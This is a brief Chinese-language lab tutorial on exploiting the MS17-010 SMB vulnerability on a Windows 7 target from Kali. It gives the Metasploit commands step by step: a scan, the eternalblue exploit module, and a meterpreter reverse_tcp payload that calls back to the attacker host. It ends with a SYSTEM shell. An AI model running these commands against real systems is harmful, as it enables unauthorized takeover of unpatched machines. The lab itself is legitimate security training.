MS17-010:利用微软SMB远程代码执行漏洞,基于端口445
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
一、实验环境
攻击主机:2021 Kali ip:192.168.110.130(ifconfig)
靶机:windows7 专业版(x64) ip:192.168.110.134(ipconfig)
准备:Kali 和 windows7 需要 ping 通,因此需要关闭 win7 的防火墙
二、实验步骤
1. msfconsole 进入 MSF
2.探索win7是否存在ms17-010漏洞,输入 search auxiliary/scanner/smb(辅助模块)
3.设置参数 ,结果可以看出win7很大可能存在ms17-010漏洞
> set RHOST 192.168.110.134
> set threads 5
4.搜索ms17-010漏洞利用模块,输入 search ms17-010
5.使用模块 use windows/smb/ms17_010_eternalblue ,设置参数
> set payload windows/x64/meterpreter/reverse_tcp
> set RHOST 192.168.110.134
> set LHOST 192.168.110.130
运行后成功得到 meterpreter shell,并且获得一个系统权限